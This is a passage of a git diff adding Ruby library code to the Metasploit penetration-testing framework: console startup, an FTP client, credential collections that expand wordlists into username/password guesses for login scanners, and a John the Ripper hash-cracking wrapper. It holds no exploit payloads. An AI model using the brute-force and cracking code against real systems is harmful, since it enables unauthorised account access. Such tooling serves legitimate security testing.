+          result['Open Directory'] = flags[7,1] == '1' ? true : false
+          result['Reconnect'] = flags[8,1] == '1' ? true : false
+          result['Server Notifications'] = flags[9,1] == '1' ? true : false
+          result['TCP/IP'] = flags[10,1] == '1' ? true : false
+          result['Server Signature'] = flags[11,1] == '1' ? true : false
+          result['Server Messages'] = flags[12,1] == '1' ? true : false
+          result['Password Saving Prohibited'] = flags[13,1] == '1' ? true : false
+          result['Password Changing'] = flags[14,1] == '1' ? true : false
+          result['Copy File'] = flags[5,1] == '1' ? true : false
+          return result
+        end
+
+      end
+    end
+
+  end
+end
+
diff --git a/lib/metasploit/framework/api.rb b/lib/metasploit/framework/api.rb
new file mode 100644
index 0000000000..b643aec8b2
--- /dev/null
+++ b/lib/metasploit/framework/api.rb
@@ -0,0 +1,7 @@
+module Metasploit
+  module Framework
+    module API
+
+    end
+  end
+end
\ No newline at end of file
diff --git a/lib/metasploit/framework/api/version.rb b/lib/metasploit/framework/api/version.rb
new file mode 100644
index 0000000000..9b6fce0da0
--- /dev/null
+++ b/lib/metasploit/framework/api/version.rb
@@ -0,0 +1,16 @@
+module Metasploit
+  module Framework
+    module API
+      # @note This is a like.  The API version is not semantically version and it's version has actually never changed
+      #    even though API changes have occured.  DO NOT base compatibility on this version.
+      module Version
+        MAJOR = 1
+        MINOR = 0
+        PATCH = 0
+      end
+
+      VERSION = "#{Version::MAJOR}.#{Version::MINOR}.#{Version::PATCH}"
+      GEM_VERSION = Gem::Version.new(VERSION)
+    end
+  end
+end
\ No newline at end of file
diff --git a/lib/metasploit/framework/command.rb b/lib/metasploit/framework/command.rb
new file mode 100644
index 0000000000..63c614f470
--- /dev/null
+++ b/lib/metasploit/framework/command.rb
@@ -0,0 +1,26 @@
+#
+# Gems
+#
+
+# have to be exact so minimum is loaded prior to parsing arguments which could
+# influence loading.
+require 'active_support/dependencies/autoload'
+
+# @note Must use the nested declaration of the
+# {Metasploit::Framework::Command} namespace because commands need to be able
+# to be required directly without any other part of metasploit-framework
+# besides config/boot so that the commands can parse arguments, setup
+# RAILS_ENV, and load config/application.rb correctly.
+module Metasploit
+  module Framework
+    module Command
+      # Namespace for commands for metasploit-framework.  There are
+      # corresponding classes in the {Metasploit::Framework::ParsedOptions}
+      # namespace, which handle for parsing the options for each command.
+      extend ActiveSupport::Autoload
+
+      autoload :Base
+      autoload :Console
+    end
+  end
+end
diff --git a/lib/metasploit/framework/command/base.rb b/lib/metasploit/framework/command/base.rb
new file mode 100644
index 0000000000..d7fa9e200d
--- /dev/null
+++ b/lib/metasploit/framework/command/base.rb
@@ -0,0 +1,113 @@
+#
+# Gems
+#
+
+require 'active_support/core_ext/module/introspection'
+
+#
+# Project
+#
+
+require 'metasploit/framework/command'
+require 'metasploit/framework/parsed_options'
+require 'metasploit/framework/require'
+
+# Based on pattern used for lib/rails/commands in the railties gem.
+class Metasploit::Framework::Command::Base
+  #
+  # Attributes
+  #
+
+  # @!attribute [r] application
+  #   The Rails application for metasploit-framework.
+  #
+  #   @return [Metasploit::Framework::Application]
+  attr_reader :application
+
+  # @!attribute [r] parsed_options
+  #   The parsed options from the command line.
+  #
+  #   @return (see parsed_options)
+  attr_reader :parsed_options
+
+  #
+  # Class Methods
+  #
+
+  # @note {require_environment!} should be called to load
+  #   `config/application.rb` to so that the RAILS_ENV can be set from the
+  #   command line options in `ARGV` prior to `Rails.env` being set.
+  # @note After returning, `Rails.application` will be defined and configured.
+  #
+  # Parses `ARGV` for command line arguments to configure the
+  # `Rails.application`.
+  #
+  # @return (see parsed_options)
+  def self.require_environment!
+    parsed_options = self.parsed_options
+    # RAILS_ENV must be set before requiring 'config/application.rb'
+    parsed_options.environment!
+    ARGV.replace(parsed_options.positional)
+
+    # allow other Rails::Applications to use this command
+    if !defined?(Rails) || Rails.application.nil?
+      # @see https://github.com/rails/rails/blob/v3.2.17/railties/lib/rails/commands.rb#L39-L40
+      require Pathname.new(__FILE__).parent.parent.parent.parent.parent.join('config', 'application')
+    end
+
+    # have to configure before requiring environment because
+    # config/environment.rb calls initialize! and the initializers will use
+    # the configuration from the parsed options.
+    parsed_options.configure(Rails.application)
+
+    # support disabling the database
+    unless parsed_options.options.database.disable
+      Metasploit::Framework::Require.optionally_active_record_railtie
+    end
+
+    Rails.application.require_environment!
+
+    parsed_options
+  end
+
+  def self.parsed_options
+    parsed_options_class.new
+  end
+
+  def self.parsed_options_class
+    @parsed_options_class ||= parsed_options_class_name.constantize
+  end
+
+  def self.parsed_options_class_name
+    @parsed_options_class_name ||= "#{parent.parent}::ParsedOptions::#{name.demodulize}"
+  end
+
+  def self.start
+    parsed_options = require_environment!
+    new(application: Rails.application, parsed_options: parsed_options).start
+  end
+
+  #
+  # Instance Methods
+  #
+
+  # @param attributes [Hash{Symbol => ActiveSupport::OrderedOptions,Rails::Application}]
+  # @option attributes [Rails::Application] :application
+  # @option attributes [ActiveSupport::OrderedOptions] :parsed_options
+  # @raise [KeyError] if :application is not given
+  # @raise [KeyError] if :parsed_options is not given
+  def initialize(attributes={})
+    @application = attributes.fetch(:application)
+    @parsed_options = attributes.fetch(:parsed_options)
+  end
+
+  # @abstract Use {#application} to start this command.
+  #
+  # Starts this command.
+  #
+  # @return [void]
+  # @raise [NotImplementedError]
+  def start
+    raise NotImplementedError
+  end
+end
diff --git a/lib/metasploit/framework/command/console.rb b/lib/metasploit/framework/command/console.rb
new file mode 100644
index 0000000000..5f2052842c
--- /dev/null
+++ b/lib/metasploit/framework/command/console.rb
@@ -0,0 +1,64 @@
+#
+# Project
+#
+
+require 'metasploit/framework/command'
+require 'metasploit/framework/command/base'
+
+# Based on pattern used for lib/rails/commands in the railties gem.
+class Metasploit::Framework::Command::Console < Metasploit::Framework::Command::Base
+  def start
+    case parsed_options.options.subcommand
+    when :version
+      $stderr.puts "Framework Version: #{Metasploit::Framework::VERSION}"
+    else
+      driver.run
+    end
+  end
+
+  private
+
+  # The console UI driver.
+  #
+  # @return [Msf::Ui::Console::Driver]
+  def driver
+    unless @driver
+      # require here so minimum loading is done before {start} is called.
+      require 'msf/ui'
+
+      @driver = Msf::Ui::Console::Driver.new(
+          Msf::Ui::Console::Driver::DefaultPrompt,
+          Msf::Ui::Console::Driver::DefaultPromptChar,
+          driver_options
+      )
+    end
+
+    @driver
+  end
+
+  def driver_options
+    unless @driver_options
+      options = parsed_options.options
+
+      driver_options = {}
+      driver_options['Config'] = options.framework.config
+      driver_options['ConfirmExit'] = options.console.confirm_exit
+      driver_options['DatabaseEnv'] = options.environment
+      driver_options['DatabaseMigrationPaths'] = options.database.migrations_paths
+      driver_options['DatabaseYAML'] = options.database.config
+      driver_options['Defanged'] = options.console.defanged
+      driver_options['DisableBanner'] = options.console.quiet
+      driver_options['DisableDatabase'] = options.database.disable
+      driver_options['LocalOutput'] = options.console.local_output
+      driver_options['ModulePath'] = options.modules.path
+      driver_options['Plugins'] = options.console.plugins
+      driver_options['RealReadline'] = options.console.real_readline
+      driver_options['Resource'] = options.console.resources
+      driver_options['XCommands'] = options.console.commands
+
+      @driver_options = driver_options
+    end
+
+    @driver_options
+  end
+end
diff --git a/lib/metasploit/framework/common_engine.rb b/lib/metasploit/framework/common_engine.rb
new file mode 100644
index 0000000000..3a0903e4f5
--- /dev/null
+++ b/lib/metasploit/framework/common_engine.rb
@@ -0,0 +1,74 @@
+#
+# Standard Library
+#
+
+require 'fileutils'
+
+# `Rails::Engine` behavior common to both {Metasploit::Framework::Application} and {Metasploit::Framework::Engine}.
+module Metasploit::Framework::CommonEngine
+  extend ActiveSupport::Concern
+
+  included do
+    #
+    # config
+    #
+
+    # Force binary encoding to remove necessity to set external and internal encoding when construct Strings from
+    # from files.  Socket#read always returns a String in ASCII-8bit encoding
+    #
+    # @see http://rubydoc.info/stdlib/core/IO:read
+    config.before_initialize do
+      encoding = 'binary'
+      Encoding.default_external = encoding
+      Encoding.default_internal = encoding
+    end
+
+    config.root = Msf::Config::install_root
+    config.paths.add 'data/meterpreter', glob: '**/ext_*'
+    config.paths.add 'modules'
+
+    #
+    # `initializer`s
+    #
+
+    initializer 'metasploit_framework.merge_meterpreter_extensions' do
+      Rails.application.railties.engines.each do |engine|
+        merge_meterpreter_extensions(engine)
+      end
+
+      # The Rails.application itself could have paths['data/meterpreter'], but will not be part of
+      # Rails.application.railties.engines because only direct subclasses of `Rails::Engine` are returned.
+      merge_meterpreter_extensions(Rails.application)
+    end
+  end
+
+  #
+  # Instance Methods
+  #
+
+  private
+
+  # Merges the meterpreter extensions from `engine`'s `paths['data/meterpreter]`.
+  #
+  # @param engine [Rails::Engine] a Rails engine or application that has meterpreter extensions
+  # @return [void]
+  # @todo Make metasploit-framework look for meterpreter extension in paths['data/meterpreter'] from the engine instead of copying them.
+  def merge_meterpreter_extensions(engine)
+    data_meterpreter_paths = engine.paths['data/meterpreter']
+
+    # may be `nil` since 'data/meterpreter' is not part of the core Rails::Engine paths set.
+    if data_meterpreter_paths
+      source_paths = data_meterpreter_paths.existent
+      destination_directory = root.join('data', 'meterpreter').to_path
+
+      source_paths.each do |source_path|
+        basename = File.basename(source_path)
+        destination_path = File.join(destination_directory, basename)
+
+        unless destination_path == source_path
+          FileUtils.copy(source_path, destination_directory)
+        end
+      end
+    end
+  end
+end
\ No newline at end of file
diff --git a/lib/metasploit/framework/community_string_collection.rb b/lib/metasploit/framework/community_string_collection.rb
new file mode 100644
index 0000000000..fdeddb4a96
--- /dev/null
+++ b/lib/metasploit/framework/community_string_collection.rb
@@ -0,0 +1,74 @@
+require 'metasploit/framework/credential'
+
+module Metasploit
+  module Framework
+
+    # This class is responsible for taking datastore options from the snmp_login module
+    # and yielding appropriate {Metasploit::Framework::Credential}s to the {Metasploit::Framework::LoginScanner::SNMP}.
+    # This one has to be different from {credentialCollection} as it will only have a {Metasploit::Framework::Credential#public}
+    # It may be slightly confusing that the attribues are called password and pass_file, because this is what the legacy
+    # module used. However, community Strings are now considered more to be public credentials than private ones.
+    class CommunityStringCollection
+      # @!attribute pass_file
+      #   Path to a file containing passwords, one per line
+      #   @return [String]
+      attr_accessor :pass_file
+
+      # @!attribute password
+      #   @return [String]
+      attr_accessor :password
+
+      # @!attribute prepended_creds
+      #   List of credentials to be tried before any others
+      #
+      #   @see #prepend_cred
+      #   @return [Array<Credential>]
+      attr_accessor :prepended_creds
+
+      # @option opts [String] :pass_file See {#pass_file}
+      # @option opts [String] :password See {#password}
+      # @option opts [Array<Credential>] :prepended_creds ([]) See {#prepended_creds}
+      def initialize(opts = {})
+        opts.each do |attribute, value|
+          public_send("#{attribute}=", value)
+        end
+        self.prepended_creds ||= []
+      end
+
+      # Combines all the provided credential sources into a stream of {Credential}
+      # objects, yielding them one at a time
+      #
+      # @yieldparam credential [Metasploit::Framework::Credential]
+      # @return [void]
+      def each
+        begin
+          if pass_file.present?
+            pass_fd = File.open(pass_file, 'r:binary')
+            pass_fd.each_line do |line|
+              line.chomp!
+              yield Metasploit::Framework::Credential.new(public: line, paired: false)
+            end
+          end
+
+          if password.present?
+            yield Metasploit::Framework::Credential.new(public: password, paired: false)
+          end
+
+        ensure
+          pass_fd.close if pass_fd && !pass_fd.closed?
+        end
+      end
+
+      # Add {Credential credentials} that will be yielded by {#each}
+      #
+      # @see prepended_creds
+      # @param cred [Credential]
+      # @return [self]
+      def prepend_cred(cred)
+        prepended_creds.unshift cred
+        self
+      end
+
+    end
+  end
+end
diff --git a/lib/metasploit/framework/core.rb b/lib/metasploit/framework/core.rb
new file mode 100644
index 0000000000..cc94d23f88
--- /dev/null
+++ b/lib/metasploit/framework/core.rb
@@ -0,0 +1,7 @@
+module Metasploit
+  module Framework
+    module Core
+
+    end
+  end
+end
\ No newline at end of file
diff --git a/lib/metasploit/framework/core/version.rb b/lib/metasploit/framework/core/version.rb
new file mode 100644
index 0000000000..c02069540b
--- /dev/null
+++ b/lib/metasploit/framework/core/version.rb
@@ -0,0 +1,19 @@
+require 'metasploit/framework/version'
+
+module Metasploit
+  module Framework
+    # @note This is a lie.  The core libraries are not semantically versioned.  This is currently just linked to the
+    #   Metasploit::Framework::Version, which is also not semantically versioned.
+    module Core
+      module Version
+        MAJOR = Metasploit::Framework::Version::MAJOR
+        MINOR = Metasploit::Framework::Version::MINOR
+        PATCH = Metasploit::Framework::Version::PATCH
+        PRERELEASE = Metasploit::Framework::Version::PRERELEASE
+      end
+
+      VERSION = Metasploit::Framework::VERSION
+      GEM_VERSION = Gem::Version.new(Metasploit::Framework::GEM_VERSION)
+    end
+  end
+end
\ No newline at end of file
diff --git a/lib/metasploit/framework/credential.rb b/lib/metasploit/framework/credential.rb
new file mode 100644
index 0000000000..94ed23b2ad
--- /dev/null
+++ b/lib/metasploit/framework/credential.rb
@@ -0,0 +1,105 @@
+require 'active_model'
+
+module Metasploit
+  module Framework
+    # This class provides an in-memory representation of a conceptual Credential
+    #
+    # It contains the public, private, and realm if any.
+    class Credential
+      include ActiveModel::Validations
+
+      # @!attribute paired
+      #   @return [Boolean] Whether BOTH a public and private are required
+      #     (defaults to `true`)
+      attr_accessor :paired
+      # @!attribute parent
+      #   @return [Object] the parent object that had .to_credential called on it to create this object
+      attr_accessor :parent
+      # @!attribute private
+      #   The private credential component (e.g. username)
+      #
+      #   @return [String] if {#paired} is `true` or {#private} is `nil`
+      #   @return [String, nil] if {#paired} is `false` or {#private} is not `nil`.
+      attr_accessor :private
+      # @!attribute private_type
+      #   The type of private credential this object represents, e.g. a
+      #   password or an NTLM hash.
+      #
+      #   @return [String]
+      attr_accessor :private_type
+      # @!attribute public
+      #   The public credential component (e.g. password)
+      #
+      #   @return [String] if {#paired} is `true` or {#public} is `nil`
+      #   @return [String, nil] if {#paired} is `false` or {#public} is not `nil`.
+      attr_accessor :public
+      # @!attribute realm
+      #   @return [String,nil] The realm credential component (e.g domain name)
+      attr_accessor :realm
+      # @!attribute realm
+      #   @return [String,nil] The type of {#realm}
+      attr_accessor :realm_key
+
+      validates :paired,
+        inclusion: { in: [true, false] }
+
+      # If we have no public we MUST have a private (e.g. SNMP Community String)
+      validates :private,
+        exclusion: { in: [nil] },
+        if: "public.nil? or paired"
+
+      # These values should be #demodularized from subclasses of
+      # `Metasploit::Credential::Private`
+      validates :private_type,
+        inclusion: { in: [ :password, :ntlm_hash, :ssh_key ] },
+        if: "private_type.present?"
+
+      # If we have no private we MUST have a public
+      validates :public,
+        presence: true,
+        if: "private.nil? or paired"
+
+      # @param attributes [Hash{Symbol => String,nil}]
+      def initialize(attributes={})
+        attributes.each do |attribute, value|
+          public_send("#{attribute}=", value)
+        end
+
+        self.paired = true if self.paired.nil?
+      end
+
+      def inspect
+        "#<#{self.class} \"#{self}\" >"
+      end
+
+      def to_s
+        if realm && realm_key == Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN
+          "#{self.realm}\\#{self.public}:#{self.private}"
+        else
+          "#{self.public}:#{self.private}#{at_realm}"
+        end
+      end
+
+      def ==(other)
+        other.respond_to?(:public) && other.public == self.public &&
+        other.respond_to?(:private) && other.private == self.private &&
+        other.respond_to?(:realm) && other.realm == self.realm
+      end
+
+      def to_credential
+        self.parent = self
+        self        
+      end
+
+      private
+
+      def at_realm
+        if self.realm.present?
+          "@#{self.realm}"
+        else
+          ""
+        end
+      end
+    end
+  end
+end
diff --git a/lib/metasploit/framework/credential_collection.rb b/lib/metasploit/framework/credential_collection.rb
new file mode 100644
index 0000000000..74a8774d3e
--- /dev/null
+++ b/lib/metasploit/framework/credential_collection.rb
@@ -0,0 +1,148 @@
+require 'metasploit/framework/credential'
+
+class Metasploit::Framework::CredentialCollection
+
+  # @!attribute blank_passwords
+  #   Whether each username should be tried with a blank password
+  #   @return [Boolean]
+  attr_accessor :blank_passwords
+
+  # @!attribute pass_file
+  #   Path to a file containing passwords, one per line
+  #   @return [String]
+  attr_accessor :pass_file
+
+  # @!attribute password
+  #   @return [String]
+  attr_accessor :password
+
+  # @!attribute prepended_creds
+  #   List of credentials to be tried before any others
+  #
+  #   @see #prepend_cred
+  #   @return [Array<Credential>]
+  attr_accessor :prepended_creds
+
+  # @!attribute realm
+  #   @return [String]
+  attr_accessor :realm
+
+  # @!attribute user_as_pass
+  #   Whether each username should be tried as a password for that user
+  #   @return [Boolean]
+  attr_accessor :user_as_pass
+
+  # @!attribute user_file
+  #   Path to a file containing usernames, one per line
+  #   @return [String]
+  attr_accessor :user_file
+
+  # @!attribute username
+  #   @return [String]
+  attr_accessor :username
+
+  # @!attribute userpass_file
+  #   Path to a file containing usernames and passwords separated by a space,
+  #   one pair per line
+  #   @return [String]
+  attr_accessor :userpass_file
+
+  # @option opts [Boolean] :blank_passwords See {#blank_passwords}
+  # @option opts [String] :pass_file See {#pass_file}
+  # @option opts [String] :password See {#password}
+  # @option opts [Array<Credential>] :prepended_creds ([]) See {#prepended_creds}
+  # @option opts [Boolean] :user_as_pass See {#user_as_pass}
+  # @option opts [String] :user_file See {#user_file}
+  # @option opts [String] :username See {#username}
+  # @option opts [String] :userpass_file See {#userpass_file}
+  def initialize(opts = {})
+    opts.each do |attribute, value|
+      public_send("#{attribute}=", value)
+    end
+    self.prepended_creds ||= []
+  end
+
+  # Add {Credential credentials} that will be yielded by {#each}
+  #
+  # @see prepended_creds
+  # @param cred [Credential]
+  # @return [self]
+  def prepend_cred(cred)
+    prepended_creds.unshift cred
+    self
+  end
+
+  # Combines all the provided credential sources into a stream of {Credential}
+  # objects, yielding them one at a time
+  #
+  # @yieldparam credential [Metasploit::Framework::Credential]
+  # @return [void]
+  def each
+    if pass_file.present?
+      pass_fd = File.open(pass_file, 'r:binary')
+    end
+
+    prepended_creds.each { |c| yield c }
+
+    if username.present?
+      if password.present?
+        yield Metasploit::Framework::Credential.new(public: username, private: password, realm: realm)
+      end
+      if user_as_pass
+        yield Metasploit::Framework::Credential.new(public: username, private: username, realm: realm)
+      end
+      if blank_passwords
+        yield Metasploit::Framework::Credential.new(public: username, private: "", realm: realm)
+      end
+      if pass_fd
+        pass_fd.each_line do |pass_from_file|
+          pass_from_file.chomp!
+          yield Metasploit::Framework::Credential.new(public: username, private: pass_from_file, realm: realm)
+        end
+        pass_fd.seek(0)
+      end
+    end
+
+    if user_file.present?
+      File.open(user_file, 'r:binary') do |user_fd|
+        user_fd.each_line do |user_from_file|
+          user_from_file.chomp!
+          if password
+            yield Metasploit::Framework::Credential.new(public: user_from_file, private: password, realm: realm)
+          end
+          if user_as_pass
+            yield Metasploit::Framework::Credential.new(public: user_from_file, private: user_from_file, realm: realm)
+          end
+          if blank_passwords
+            yield Metasploit::Framework::Credential.new(public: user_from_file, private: "", realm: realm)
+          end
+          if pass_fd
+            pass_fd.each_line do |pass_from_file|
+              pass_from_file.chomp!
+              yield Metasploit::Framework::Credential.new(public: user_from_file, private: pass_from_file, realm: realm)
+            end
+            pass_fd.seek(0)
+          end
+        end
+      end
+    end
+
+    if userpass_file.present?
+      File.open(userpass_file, 'r:binary') do |userpass_fd|
+        userpass_fd.each_line do |line|
+          user, pass = line.split(" ", 2)
+          if pass.blank?
+            pass = ''
+          else
+            pass.chomp!
+          end
+          yield Metasploit::Framework::Credential.new(public: user, private: pass, realm: realm)
+        end
+      end
+    end
+
+  ensure
+    pass_fd.close if pass_fd && !pass_fd.closed?
+  end
+
+end
diff --git a/lib/metasploit/framework/database.rb b/lib/metasploit/framework/database.rb
index 78d3525cf5..4c8f99d4da 100644
--- a/lib/metasploit/framework/database.rb
+++ b/lib/metasploit/framework/database.rb
@@ -8,7 +8,7 @@ module Metasploit
       end
 
       def self.configurations_pathname
-        Metasploit::Framework.root.join('config', 'database.yml')
+        Metasploit::Framework::Application.paths['config/database'].first
       end
     end
   end
diff --git a/lib/metasploit/framework/engine.rb b/lib/metasploit/framework/engine.rb
new file mode 100644
index 0000000000..95f7127fe3
--- /dev/null
+++ b/lib/metasploit/framework/engine.rb
@@ -0,0 +1,19 @@
+#
+# Gems
+#
+
+require 'rails/engine'
+
+#
+# Project
+#
+
+require 'metasploit/framework/common_engine'
+
+module Metasploit
+  module Framework
+    class Engine < Rails::Engine
+      include Metasploit::Framework::CommonEngine
+    end
+  end
+end
diff --git a/lib/metasploit/framework/ftp/client.rb b/lib/metasploit/framework/ftp/client.rb
new file mode 100644
index 0000000000..a1e3794549
--- /dev/null
+++ b/lib/metasploit/framework/ftp/client.rb
@@ -0,0 +1,276 @@
+require 'metasploit/framework/tcp/client'
+
+module Metasploit
+  module Framework
+    module Ftp
+      module Client
+        include Metasploit::Framework::Tcp::Client
+
+        #
+        # This method establishes an FTP connection to host and port specified by
+        # the 'rhost' and 'rport' methods. After connecting, the banner
+        # message is read in and stored in the 'banner' attribute.
+        #
+        def connect(global = true)
+          fd = super(global)
+
+          @ftpbuff = '' unless @ftpbuff
+
+          # Wait for a banner to arrive...
+          self.banner = recv_ftp_resp(fd)
+
+          # Return the file descriptor to the caller
+          fd
+        end
+
+        #
+        # This method handles establishing datasocket for data channel
+        #
+        def data_connect(mode = nil, nsock = self.sock)
+          if mode
+            res = send_cmd([ 'TYPE' , mode ], true, nsock)
+            return nil if not res =~ /^200/
+          end
+
+          # force datasocket to renegotiate
+          self.datasocket.shutdown if self.datasocket != nil
+
+          res = send_cmd(['PASV'], true, nsock)
+          return nil if not res =~ /^227/
+
+          # 227 Entering Passive Mode (127,0,0,1,196,5)
+          if res =~ /\((\d+)\,(\d+),(\d+),(\d+),(\d+),(\d+)/
+            # convert port to FTP syntax
+            datahost = "#{$1}.#{$2}.#{$3}.#{$4}"
+            dataport = ($5.to_i * 256) + $6.to_i
+            self.datasocket = Rex::Socket::Tcp.create('PeerHost' => datahost, 'PeerPort' => dataport)
+          end
+          self.datasocket
+        end
+
+        #
+        # This method handles disconnecting our data channel
+        #
+        def data_disconnect
+          self.datasocket.shutdown
+          self.datasocket = nil
+        end
+
+        #
+        # Connect and login to the remote FTP server using the credentials
+        # that have been supplied in the exploit options.
+        #
+        def connect_login(user,pass,global = true)
+          ftpsock = connect(global)
+
+          if !(user and pass)
+            return false
+          end
+
+          res = send_user(user, ftpsock)
+
+          if (res !~ /^(331|2)/)
+            return false
+          end
+
+          if (pass)
+            res = send_pass(pass, ftpsock)
+            if (res !~ /^2/)
+              return false
+            end
+          end
+
+          return true
+        end
+
+        #
+        # This method logs in as the supplied user by transmitting the FTP
+        # 'USER <user>' command.
+        #
+        def send_user(user, nsock = self.sock)
+          raw_send("USER #{user}\r\n", nsock)
+          recv_ftp_resp(nsock)
+        end
+
+        #
+        # This method completes user authentication by sending the supplied
+        # password using the FTP 'PASS <pass>' command.
+        #
+        def send_pass(pass, nsock = self.sock)
+          raw_send("PASS #{pass}\r\n", nsock)
+          recv_ftp_resp(nsock)
+        end
+
+        #
+        # This method sends a QUIT command.
+        #
+        def send_quit(nsock = self.sock)
+          raw_send("QUIT\r\n", nsock)
+          recv_ftp_resp(nsock)
+        end
+
+        #
+        # This method sends one command with zero or more parameters
+        #
+        def send_cmd(args, recv = true, nsock = self.sock)
+          cmd = args.join(" ") + "\r\n"
+          ret = raw_send(cmd, nsock)
+          if (recv)
+            return recv_ftp_resp(nsock)
+          end
+          return ret
+        end
+
+        #
+        # This method transmits the command in args and receives / uploads DATA via data channel
+        # For commands not needing data, it will fall through to the original send_cmd
+        #
+        # For commands that send data only, the return will be the server response.
+        # For commands returning both data and a server response, an array will be returned.
+        #
+        # NOTE: This function always waits for a response from the server.
+        #
+        def send_cmd_data(args, data, mode = 'a', nsock = self.sock)
+          type = nil
+          # implement some aliases for various commands
+          if (args[0] =~ /^DIR$/i || args[0] =~ /^LS$/i)
+            # TODO || args[0] =~ /^MDIR$/i || args[0] =~ /^MLS$/i
+            args[0] = "LIST"
+            type = "get"
+          elsif (args[0] =~ /^GET$/i)
+            args[0] = "RETR"
+            type = "get"
+          elsif (args[0] =~ /^PUT$/i)
+            args[0] = "STOR"
+            type = "put"
+          end
+
+          # fall back if it's not a supported data command
+          if not type
+            return send_cmd(args, true, nsock)
+          end
+
+          # Set the transfer mode and connect to the remove server
+          return nil if not data_connect(mode)
+
+          # Our pending command should have got a connection now.
+          res = send_cmd(args, true, nsock)
+          # make sure could open port
+          return nil unless res =~ /^(150|125) /
+
+          # dispatch to the proper method
+          if (type == "get")
+            # failed listings jsut disconnect..
+            begin
+              data = self.datasocket.get_once(-1, ftp_timeout)
+            rescue ::EOFError
+              data = nil
+            end
+          else
+            sent = self.datasocket.put(data)
+          end
+
+          # close data channel so command channel updates
+          data_disconnect
+
+          # get status of transfer
+          ret = nil
+          if (type == "get")
+            ret = recv_ftp_resp(nsock)
+            ret = [ ret, data ]
+          else
+            ret = recv_ftp_resp(nsock)
+          end
+
+          ret
+        end
+
+        #
+        # This method transmits a FTP command and waits for a response.  If one is
+        # received, it is returned to the caller.
+        #
+        def raw_send_recv(cmd, nsock = self.sock)
+          nsock.put(cmd)
+          nsock.get_once(-1, ftp_timeout)
+        end
+
+        #
+        # This method reads an FTP response based on FTP continuation stuff
+        #
+        def recv_ftp_resp(nsock = self.sock)
+          found_end = false
+          resp = ""
+          left = ""
+          if !@ftpbuff.empty?
+            left << @ftpbuff
+            @ftpbuff = ""
+          end
+          while true
+            data = nsock.get_once(-1, ftp_timeout)
+            if not data
+              @ftpbuff << resp
+              @ftpbuff << left
+              return data
+            end
+
+            got = left + data
+            left = ""
+
+            # handle the end w/o newline case
+            enlidx = got.rindex(0x0a.chr)
+            if enlidx != (got.length-1)
+              if not enlidx
+                left << got
+                next
+              else
+                left << got.slice!((enlidx+1)..got.length)
+              end
+            end
+
+            # split into lines
+            rarr = got.split(/\r?\n/)
+            rarr.each do |ln|
+              if not found_end
+                resp << ln
+                resp << "\r\n"
+                if ln.length > 3 and ln[3,1] == ' '
+                  found_end = true
+                end
+              else
+                left << ln
+                left << "\r\n"
+              end
+            end
+            if found_end
+              @ftpbuff << left
+              return resp
+            end
+          end
+        end
+
+        #
+        # This method transmits a FTP command and does not wait for a response
+        #
+        def raw_send(cmd, nsock = self.sock)
+          nsock.put(cmd)
+        end
+
+        def ftp_timeout
+          raise NotImplementedError
+        end
+
+
+
+        protected
+
+        #
+        # This attribute holds the banner that was read in after a successful call
+        # to connect or connect_login.
+        #
+        attr_accessor :banner, :datasocket
+
+
+      end
+    end
+  end
+end
diff --git a/lib/metasploit/framework/jtr/cracker.rb b/lib/metasploit/framework/jtr/cracker.rb
new file mode 100644
index 0000000000..52cd44ff7f
--- /dev/null
+++ b/lib/metasploit/framework/jtr/cracker.rb
@@ -0,0 +1,272 @@
+module Metasploit
+  module Framework
+    module JtR
+
+      class JohnNotFoundError < StandardError
+      end
+
+      class Cracker
+        include ActiveModel::Validations
+
+        # @!attribute config
+        #   @return [String] The path to an optional config file for John to use
+        attr_accessor :config
+
+        # @!attribute format
+        #   @return [String] The hash format to try
+        attr_accessor :format
+
+        # @!attribute hash_path
+        #   @return [String] The path to the file containing the hashes
+        attr_accessor :hash_path
+
+        # @!attribute incremental
+        #   @return [String] The incremental mode to use
+        attr_accessor :incremental
+
+        # @!attribute john_path
+        #   This attribute allows the user to specify a john binary to use.
+        #   If not supplied, the Cracker will search the PATH for a suitable john binary
+        #   and finally fall back to the pre-compiled versions shipped with Metasploit.
+        #
+        #   @return [String] The file path to an alternative John binary to use
+        attr_accessor :john_path
+
+        # @!attribute max_runtime
+        #   @return [Fixnum] An optional maximum duration of the cracking attempt in seconds
+        attr_accessor :max_runtime
+
+        # @!attribute pot
+        #   @return [String] The file path to an alternative John pot file to use
+        attr_accessor :pot
+
+        # @!attribute rules
+        #   @return [String] The wordlist mangling rules to use inside John
+        attr_accessor :rules
+
+        # @!attribute wordlist
+        #   @return [String] The file path to the wordlist to use
+        attr_accessor :wordlist
+
+        validates :config, :'Metasploit::Framework::File_path' => true, if: 'config.present?'
+
+        validates :hash_path, :'Metasploit::Framework::File_path' => true, if: 'hash_path.present?'
+
+        validates :john_path, :'Metasploit::Framework::Executable_path' => true, if: 'john_path.present?'
+
+        validates :pot, :'Metasploit::Framework::File_path' => true, if: 'pot.present?'
+
+        validates :max_runtime,
+                  numericality: {
+                      only_integer:             true,
+                      greater_than_or_equal_to: 0
+                  }, if: 'max_runtime.present?'
+
+        validates :wordlist, :'Metasploit::Framework::File_path' => true, if: 'wordlist.present?'
+
+        # @param attributes [Hash{Symbol => String,nil}]
+        def initialize(attributes={})
+          attributes.each do |attribute, value|
+            public_send("#{attribute}=", value)
+          end
+        end
+
+        # This method follows a decision tree to determine the path
+        # to the John the Ripper binary we should use.
+        #
+        # @return [NilClass] if a binary path could not be found
+        # @return [String] the path to the selected JtR binary
+        def binary_path
+          # Always prefer a manually entered path
+          if john_path && ::File.file?(john_path)
+            bin_path = john_path
+          else
+            # Look in the Environment PATH for the john binary
+            path = Rex::FileUtils.find_full_path("john") ||
+                Rex::FileUtils.find_full_path("john.exe")
+
+            if path && ::File.file?(path)
+              bin_path = path
+            else
+              # If we can't find john anywhere else, look at our precompiled binaries
+              bin_path = select_shipped_binary
+            end
+          end
+          raise JohnNotFoundError, 'No suitable John binary was found on the system' if bin_path.blank?
+          bin_path
+        end
+
+        # This method runs the command from {#crack_command} and yields each line of output.
+        #
+        # @yield [String] a line of output from the john command
+        # @return [void]
+        def crack
+          ::IO.popen(crack_command, "rb") do |fd|
+            fd.each_line do |line|
+              yield line
+            end
+          end
+        end
+
+        # This method builds an array for the command to actually run the cracker.
+        # It builds the command from all of the attributes on the class.
+        #
+        # @raise [JohnNotFoundError] if a suitable John binary was never found
+        # @return [Array] An array set up for {::IO.popen} to use
+        def crack_command
+          cmd_string = binary_path
+          cmd = [ cmd_string,  '--session=' + john_session_id, '--nolog' ]
+
+          if config.present?
+            cmd << ( "--config=" + config )
+          else
